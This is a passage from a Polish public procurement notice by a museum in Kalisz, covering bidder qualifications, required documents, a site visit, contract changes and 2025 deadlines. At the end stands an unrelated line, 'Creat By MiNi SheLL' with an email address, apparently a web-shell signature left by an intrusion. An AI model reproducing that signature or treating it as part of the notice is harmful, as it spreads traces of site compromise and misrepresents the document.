wymienionej specjalności.<br/>Zamawiający dopuszcza łączenie wskazanych powyżej funkcji przez jedną osobę.<br/>Ponadto:<br/>Wykonawca musi wykazać, że dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu<br/>zamówienia, posiadającymi uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie oraz<br/>odpowiednie doświadczenie tj.: co najmniej jedną osobą, która będzie pełnić funkcję Kierownika budowy, posiadającą<br/>uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz<br/>posiadającą co najmniej 5-letnie doświadczenie na stanowisku kierownika budowy w zakresie posiadanych uprawnień<br/>budowlanych. Kierownik budowy powinien posiadać kwalifikacje, o których mowa w art. 37 c Ustawy z dnia 23 lipca 2003 r.<br/>o ochronie zabytków i opiece nad zabytkami.<br/>Uwagi:<br/>1. Uprawnienia, o których mowa powyżej, powinny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z<br/>2020 r., poz. 1333 z późn. zm.) lub ważne odpowiadające im kwalifikacje, nadane na podstawie wcześniej obowiązujących<br/>przepisów upoważniające do kierowania robotami budowlanymi w zakresie objętym niniejszym zamówieniem.<br/>2. Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1<br/>ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach<br/>określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t. j. Dz. U. z 2020 r., poz. 220).<br/>3. W przypadku osób będących obywatelami państw członkowskich UE, Konfederacji Szwajcarskiej lub państw<br/>członkowskich (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym - prawo do wykonywania samodzielnych<br/>funkcji technicznych w budownictwie na terytorium RP winno być potwierdzone odpowiednią decyzją o uznaniu kwalifikacji<br/>zawodowych lub prawa do świadczenia usług transgranicznych.<br/>4. Dopuszcza się uprawnienia równoważne (w zakresie koniecznym do wykonania przedmiotu zamówienia) - dla osób,<br/>które posiadają uprawnienia uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub<br/>stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie i<br/>zachowały uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełniania warunków udziału w postępowaniu<br/>określonych przez Zamawiającego w pkt 5.3 SWZ, zostanie wezwany do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):<br/>a) wykazu wykonanych prac (załącznik nr 4), a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, wraz z dowodami określającymi, czy usługi wykazane w wykazie usług zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa powyżej, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Okresy liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>b) wykazu osób (załącznik nr 5), skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na<br/>temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami,<br/>c) kserokopii poświadczonej za zgodność z oryginałem ubezpieczenia OC wraz z dokumentem potwierdzającym uiszczenie zapłaty za składkę,<br/>d) oświadczenia o grupie kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wraz z ofertą Wykonawca/Wykonawcy składa/składają oświadczenie, o którym mowa w art. 125 ust. 1 Pzp. o niepodleganiu wykluczeniu z<br/>postępowania oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w niniejszym SWZ – zgodnie z<br/>załącznikiem nr 1 i 2. Wykonawca, w przypadku polegania na sytuacji podmiotów udostępniających mu zasoby, przedstawia oświadczenie tego podmiotu, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w<br/>postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby – zgodnie z załącznikiem nr 7 do SWZ. Oświadczenia,<br/>o których mowa powyżej, składa się, pod rygorem nieważności, w formie elektronicznej (w postaci elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykonawca, którego oferta zostanie najwyżej oceniona, nie będzie wezwany do złożenia przedmiotowych środków<br/>dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Przed złożeniem oferty wymagane jest przeprowadzenie wizji lokalnej (pod rygorem odrzucenia oferty w myśl art. 226 ust. 1<br/>pkt 18 Pzp) lokalizacji, w której będą realizowane prace objęte zamówieniem. W celu dokonania wizji należy kontaktować<br/>się z panią Beatą Tokarek - kierowniczką Działu Gospodarczego. Wykonawca po dokonaniu wizji lokalnej otrzyma<br/>potwierdzenie, które należy dołączyć w formie skanu do składanej oferty.<br/>Miejsce oraz obiekt objęty przedmiotem zamówienia można oglądać w dni robocze od 14 do 25 kwietnia br. w godz. 8:00 –<br/>14:00, po wcześniejszym uzgodnieniu terminu z Zamawiającym.<br/>W celu uzgodnienia terminu należy kontaktować się z Panią Beatą Tokarek pod nr tel. (62) 501 34 84 lub mailowo:<br/>tokarek@muzeumwkaliszu.pl<br/><br/>Udział w wizji lokalnej w ramach wcześniejszego, unieważnionego postępowania (Sprawa 1-TP-2025) zwalnia wykonawcę z obowiązku odbycia wizji w kolejnym postępowaniu o tym samym zakresie (Sprawa 2-TP-2025). Należy jednak dołączyć potwierdzenie odbycia wizji lokalnej do składanej oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1<br/>Pzp. o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu w zakresie<br/>wskazanym w niniejszym SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia<br/>oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu.<br/>3. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w<br/>art. 112 ust. 2 pkt 2 ustawy, będzie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i<br/>zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane, do realizacji których te zdolności są wymagane.<br/>5. Wykonawcy wspólnie ubiegający się o zamówienie składają oświadczenie, o którym mowa w art. 117 ust. 4 Pzp<br/>(oświadczenie, z którego wynika, które roboty budowlane, dostawy bądź usługi wykonają poszczególni Wykonawcy). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wzór umowy stanowi załącznik nr 6 do SWZ. Zamawiający dopuszcza możliwość zmiany umowy w następujących przypadkach:<br/>a) zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą na potrzeby niniejszego warunku, rozumieć należy<br/>zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:<br/>- o charakterze niezależnym od stron,<br/>- którego strony nie mogły przewidzieć przed zawarciem umowy,<br/>- którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności, której nie<br/>można przypisać drugiej stronie.<br/>Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar, inne klęski żywiołowe,<br/>nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, zmiany powszechnie<br/>obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron,<br/>zwłaszcza przepisy dotyczące wynagrodzenia za pracę.<br/>Dopuszczalna jest zmiana wynagrodzenia Wykonawcy w przypadku:<br/>a) zmiany powszechnie obowiązujących przepisów dotyczących minimalnego wynagrodzenia za pracę lub/i wysokość<br/>składek na ubezpieczenie społeczne,<br/>b) powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny<br/>sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej<br/>zapisów przez strony,<br/>c) zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową,<br/>zdolnościami płatniczymi lub warunkami organizacyjnymi,<br/>d) okolicznościami, które nie były możliwe do przewidzenia w momencie zawarcia umowy będą mogły nastąpić niżej<br/>określone zmiany:<br/>termin realizacji umowy,<br/>zmiana osób wskazanych w ofercie, przy czym Wykonawca jest zobowiązany udowodnić, że osoby które proponuje mają<br/>takie same doświadczenie, uprawnienia i inne elementy wymagane w ogłoszeniu, co osoby wskazane w ofercie,<br/>zmiana w zakresie konieczności zmiany osób wskazanych w ofercie, przy pomocy których Wykonawca realizuje przedmiot<br/>umowy z powodów zależnych od Wykonawcy lub w przypadku, jeżeli Zamawiający uzna, że osoby te nie wykonują<br/>obowiązków w sposób zgodny z SWZ – Wykonawca jest zobowiązany do przedstawienia oświadczeń i dokumentów<br/>odnoszących się do nowego pracownika lub nowych pracowników, zgodnych z zapisami SWZ,<br/>w przypadku zaistnienia okoliczności wskazanych w art. 455 ustawy Pzp,<br/>w przypadku braku możliwości zmiany okoliczności powodującej, że wykonanie umowy mnie leży w interesie publicznym,<br/>czego nie można było przewidzieć w chwili zawarcia umowy, a także w przypadkach określonych w art. 456 Pzp<br/>Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim<br/>przypadku Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy,<br/>zmiana terminów realizacji zamówienia z przyczyn zależnych od Wykonawcy, jeżeli Zamawiający wyrazi zgodę,<br/>gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub<br/>techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania<br/>umowy, zgodnie ze specyfikacja istotnych warunków zamówienia – Zamawiający dopuszcza możliwość zmiany umowy, w<br/>szczególności w zakresie zmiany przedmiotu zamówienia, terminu realizacji. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Złożenie oferty jest możliwe wyłącznie na Platformie e-zamówienia zgodnie z instrukcją zamieszczoną na stronie https://ezamowienia.gov.pl/pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-23 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Muzeum Okręgowe Ziemi Kaliskiej w Kaliszu otrzymało dofinansowanie ze środków Samorządu Województwa<br/>Wielkopolskiego na realizację niniejszego zadania.<br/><br/>Udział w wizji lokalnej w ramach wcześniejszego, unieważnionego postępowania (Sprawa 1-TP-2025) zwalnia wykonawcę z obowiązku odbycia wizji w kolejnym postępowaniu o tym samym zakresie (Sprawa 2-TP-2025). Należy jednak dołączyć potwierdzenie odbycia wizji lokalnej do składanej oferty.<br/><br/>1. Termin wykonania przedmiotu zamówienia: od dnia podpisania umowy do dnia 12.12.2025r.<br/>2. Termin złożenia w sekretariacie MOZK do akceptacji bądź wprowadzenia zmian przez Zleceniodawcę kompletu dokumentacji projektowo-kosztorysowej: 30 czerwca 2025 r.<br/>3. Termin złożenia w sekretariacie MOZK wersji papierowych oraz wersji elektronicznej dokumentacji projektowo-kosztorysowej 15 lipca 2025 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com